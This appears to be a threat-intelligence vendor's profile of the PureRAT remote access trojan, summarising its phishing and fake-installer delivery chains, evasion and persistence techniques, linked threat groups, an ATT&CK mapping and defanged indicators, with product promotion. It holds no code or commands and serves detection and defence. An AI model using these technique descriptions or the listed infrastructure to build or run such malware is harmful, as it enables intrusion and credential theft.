MalwareRansomwareUsed by 3 actors

PureRAT

PureRAT is a .NET-based remote access trojan/backdoor used in multiple criminal intrusion campaigns. The content describes it as a sophisticated, multi-stage, largely fileless RAT that commonly infects Windows systems through phishing and fake-installer delivery chains. Observed initial access vectors include malicious LNK files that launch hidden PowerShell, ClickFix-style phishing flows, booking-themed phishing targeting hotel staff, malicious XLL add-ins delivered in ZIP archives, and ISO/RAR-based fake software or business-document lures. In several campaigns, payloads were concealed in PNG images via steganography and loaded directly into memory.

Behavior and capabilities directly described in the content include PowerShell-based staging, host fingerprinting and system-information collection, downloading of additional payloads, persistence via scheduled tasks, registry Run keys, Startup-folder shortcuts, and in some cases DLL side-loading using AddInProcess32.exe for in-memory execution. Evasion and anti-analysis techniques mentioned include obfuscated VBScript/PowerShell stages, anti-VM checks for VMware and QEMU, UAC bypass via cmstp.exe, process hollowing into msbuild.exe, .NET Reactor/Themida protection, and fileless in-memory assembly loading. Reported modular/plugin functionality includes keylogging, on-demand credential theft, remote desktop access/control, desktop image capture, active-window monitoring, mouse and keyboard emulation, and microphone/webcam monitoring.

PureRAT is associated in the content with several threat operations. Sekoia identified it as the core malware in the "I Paid Twice" hospitality campaign abusing compromised Booking.com accounts and ClickFix redirection to steal hotel-platform credentials. Microsoft Defender content also references Booking-themed phishing aimed at hotel staff dropping PureRAT to steal Booking.com logins. BI.ZONE reported Fluffy Wolf using PureRAT in phishing campaigns against Russian organizations in sectors including construction, consulting, manufacturing, engineering, retail, e-commerce, and industry, alongside PureLogs and Pay2Key; BI.ZONE also observed a newer PureRAT version with the PluginRemoteDesktop module in attacks on Russian organizations. Kaspersky described a separate threat group targeting Russian educational institutions, energy, finance, government, and diplomatic entities that previously used PureRAT and delivered it via malicious XLL chains. Elastic linked REF1695 to ISO-based fake-installer campaigns deploying PureRAT alongside CNB Bot, PureMiner, custom XMRig loaders, and SilentCryptoMiner. Breakglass Intelligence also tied PureRAT to a broader cybercrime infrastructure cluster overlapping with ResolverRAT, PureHVNC, and PureLogs.

High-confidence indicators and infrastructure explicitly mentioned for PureRAT include crixup[.]com, instantservices1[.]ddnsguru[.]com, IP 178.16.52[.]58 over port 1917, and additional PureRAT-related infrastructure such as windirautoupdates[.]top, winautordr.itemdb[.]com, winautordr.ydns[.]eu, winautordr.kozow[.]com, system-update-cloud[.]store, 64.20.56[.]185, and 45.14.245[.]145. One report notes port 4782 as the default port for PureRAT. The content also lists these SHA-256 indicators associated with PureRAT activity: 7d22c61e8aafc9a2a812cafe7720922ab12d770e5af7d92527d9b0dbd6e10f30, 96b4713c6b9e5283f9d2f570a51edce66fc44ced2ae130b65dbe1326690a27eb, 40bd37eba7f9a56516c96092d5c6d50937fc4df00baf79155ada9d1673389830, 121ae6c664aaef9ed2e44ed04c66e1cabcb00295c48289afd9e23126fc6edadf, 96d4e77c0d433b14c2030be194ad12e159b5292f33da3a7d4d2749475845c253, bb1075ca2ff0a9b5e407fb396f8f87705d8f512b42b3f4326586ef17fed8aabb, and e0c0418d8bad7b4731b7de35059c6a51c49825e6ec841193cd8842220957cff9.

For your environment

Hunt this family in your stack

Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.

Start free trial

THREAT ACTORS

Groups observed using it

3 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.

View more details

Fluffy Wolf

These scripts systematically deploy the final payloads, which include the notorious Pay2Key ransomware, the PureLogs information stealer, and the PureRAT trojan.

via security online infosecurityonline.info

REF1695

However, instead of the promised software, a series of loaders installs a malicious toolkit including CNB Bot, PureRAT, and SilentCryptoMiner.

via hackreadhackread.com

Greedy Sponge

Credential Theft and Remote Access Surge as AllaKore, PureRAT, and Hijack Loader Proliferate

via cloudatg insightscloudatg.com

MITRE ATT&CK

Techniques & procedures

30 distinct techniques documented for this family, organized by ATT&CK tactic.

Initial Access

3 techniques

T1566PhishingEvidence5

An active phishing campaign has been targeting hotel and other hospitality organizations across Europe and Asia since April 2026... Phishing emails carry the display name "Booking Manager (via Calendly)" and reference guest complaints, bedbug infestations, room inquiries, health inspections, and stay reviews.

T1566.001Spearphishing AttachmentEvidence2

В 2026 году атаки начинались через фишинговое письмо с ZIP-архивом, содержащим XLL-файл. Этот файл маскировался под легитимную надстройку для Microsoft Excel.

T1566.002Spearphishing LinkEvidence2

...а в других случаях жертве предоставляли ссылку на GitHub-репозиторий, откуда загружался RAR-архив. По словам исследователей, Fluffy Wolf активно использует GitHub, потому что такие ссылки выглядят легитимно и помогают обходить почтовые фильтры...

Execution

7 techniques

T1053.005Scheduled TaskEvidence1

before copying itself and establishing a Task Scheduler job for persistence

T1059.001PowerShellEvidence2

Once deployed through the ClickFix redirection mechanism, PureRAT executes PowerShell commands that gather system information and download additional payload files.

T1059.003Windows Command ShellEvidence1

При запуске архива все файлы распаковываются во временный каталог. Затем выполняется batch-файл, который подготавливает интерпретатор и скрипт, после чего запускает последний.

T1059.005Visual BasicEvidence1

downloads a heavily obfuscated VBS file to circumvent detection

T1059.010AutoHotKey & AutoITEvidence1

T1204User ExecutionEvidence1

When users land on ClickFix pages, they encounter Booking.com brand elements alongside a reCAPTCHA interface prompting them to copy commands.

T1204.002Malicious FileEvidence2

Двойной клик по нему запускал приложение Excel, которое загружало в свой процесс исполняемую DLL-библиотеку, что приводило к запуску вредоносного кода.

Persistence

3 techniques

T1053.005Scheduled TaskEvidence1

before copying itself and establishing a Task Scheduler job for persistence

T1547.001Registry Run Keys / Startup FolderEvidence2

T1547.001 Registry Run Keys / Startup Folder Dual Run (Node.js) + RunOnce ( ProgramData EXE)

T1547.009Shortcut ModificationEvidence1

Additionally, shortcut files (.lnk) are placed in the Windows Startup directory to trigger execution during boot sequences.

Privilege Escalation

4 techniques

T1053.005Scheduled TaskEvidence1

before copying itself and establishing a Task Scheduler job for persistence

T1055Process InjectionEvidence2

To remain hidden, the threat actors inject these payloads into trusted Windows processes such as RegAsm.exe, InstallUtil.exe, and MSBuild.exe.

T1547.001Registry Run Keys / Startup FolderEvidence2

T1547.001 Registry Run Keys / Startup Folder Dual Run (Node.js) + RunOnce ( ProgramData EXE)

T1547.009Shortcut ModificationEvidence1

Additionally, shortcut files (.lnk) are placed in the Windows Startup directory to trigger execution during boot sequences.

Stealth

6 techniques

T1055Process InjectionEvidence2

To remain hidden, the threat actors inject these payloads into trusted Windows processes such as RegAsm.exe, InstallUtil.exe, and MSBuild.exe.

T1140Deobfuscate/Decode Files or InformationEvidence1

fetch a PNG file with a base64-encoded PE payload and another PNG file, whose decoded assembly is directly loaded into memory

T1218System Binary Proxy ExecutionEvidence1

The .exe binary triggers DLL side-loading using AddInProcess32.exe, a legitimate Windows component designed to host COM add-ins.

T1218.009Regsvcs/RegasmEvidence1

Скрипт расшифровывает файл, запускает процесс RegAsm.exe и внедряет вредоносную нагрузку в этот процесс.

T1497Virtualization/Sandbox EvasionEvidence1

Multiple VMware and QEMU virtual machine environment checks are then conducted

T1620Reflective Code LoadingEvidence1

whose decoded assembly is directly loaded into memory

Credential Access

3 techniques

T1003OS Credential DumpingEvidence1

Additional plugins have also allowed keylogging, on-demand credential theft

T1056Input CaptureEvidence2

This dangerous plug-in drastically expands the attackers’ control, allowing them to ... manipulate mouse and keyboard input remotely.

T1056.001KeyloggingEvidence1

Additional plugins have also allowed keylogging

Discovery

2 techniques

T1082System Information DiscoveryEvidence2

The loader gathers comprehensive system information including machine name, current user, Windows version, and installed antivirus products before downloading a ZIP archive containing executable and dynamic link library files.

T1497Virtualization/Sandbox EvasionEvidence1

Multiple VMware and QEMU virtual machine environment checks are then conducted

Collection

4 techniques

T1056Input CaptureEvidence2

This dangerous plug-in drastically expands the attackers’ control, allowing them to ... manipulate mouse and keyboard input remotely.

T1056.001KeyloggingEvidence1

Additional plugins have also allowed keylogging

T1113Screen CaptureEvidence1

This dangerous plug-in drastically expands the attackers’ control, allowing them to seamlessly capture desktop images...

T1560Archive Collected DataEvidence1

Файл Putty.exe представляет собой самораспаковывающийся CAB-архив... внутри которого находятся разделенные на несколько файлов интерпретатор AutoIt и скрипт для него, а также batch-файл.

Command and Control

6 techniques

T1008Fallback ChannelsEvidence1

Command and Control Fallback Channels T1008 22 C2 IPs, 8 domains, 10+ port options

T1071Application Layer ProtocolEvidence1

The infrastructure commonly supports ransomware command and control (C2) servers, malware distribution, phishing campaigns, botnet management, and data exfiltration staging.

T1071.001Web ProtocolsEvidence1

Command and Control Application Layer Protocol T1071.001 HTTPS C2 with certificate pinning

T1105Ingress Tool TransferEvidence6

Once PowerLoader infiltrates a target host, it spawns hidden PowerShell instances to retrieve additional malicious scripts directly from the command-and-control (C2) server. These scripts systematically deploy the final payloads...

T1219Remote Access ToolsEvidence4

For the very first time in attacks against Russian enterprises, the threat actors deployed “PluginRemote Desktop” for PureRAT... allowing them to seamlessly capture desktop images, monitor active windows, and even manipulate mouse and keyboard input remotely.

T1571Non-Standard PortEvidence1

Command and Control Non-Standard Port T1571 Ports 56001, 4782, 1337, 7777, 9090

INDICATORS OF COMPROMISE

IOCs tracked for this family

93 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.

View more in app

Network

50 tracked

IPs, domains, and DNS infrastructure linked to this family.

Hashes

33 tracked

File hashes (MD5, SHA-1, SHA-256) from samples and reports.

Other

10 tracked

Other indicator types observed in public reporting.

TypeValueLatest sighting

ip.v4●●●●●●●●●●●●View more in app1 day ago

domain●●●●●●●●●●●●View more in app3 days ago

hash.sha256●●●●●●●●●●●●View more in app19 days ago

ACTIVITY FEED

Recent activity

46 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

46 SOURCESView more in app

the hacker newsNews

Jun 26, 2026

Microsoft Warns of Photo ZIP Phishing Campaign Targeting Hotels with Node.js Implant

A remote access malware family referenced here as being delivered in ClickFix campaigns to steal Booking.com credentials from hotel staff.

microsoft generalNews

Jun 25, 2026

Photo ZIP campaign targeting hospitality industry delivers Node.js implant for persistent access | Microsoft Security Blog

Microsoft Defender detection name associated with the ProgramData persistence executable in this attack chain.

security online infoNews

Jun 16, 2026

Fluffy Wolf Phishing Attacks Push PowerLoader Malware

Remote access trojan used by Fluffy Wolf; observed with a new PluginRemote Desktop capability enabling desktop capture, active window monitoring, and remote mouse/keyboard control.

xakepNews

Jun 1, 2026

Хакеры атакуют организации в РФ с помощью инструмента для пентестов Ravage - Хакер

Known backdoor/RAT delivered by one of the downloaded components in the infection chain; also noted as a tool previously used by the attackers.

+42 more in the timeline

What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets match these IOCs, which detections are missing, which campaigns to expect next, and what to do in the next 30 minutes.

Start free trial

IOC matching93

Match every observed IP, domain, and hash against your live telemetry.

Threat actor attribution3

Named campaigns wielding this family, with evidence pinned to each claim.

Exploited vulnerabilities

CVEs this family uses for access and lateral movement.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

MITRE ATT&CK mapping30

Every documented technique, ranked by evidence weight.

Researcher chatter

Reddit, Mastodon, and CTI community discussion around this family.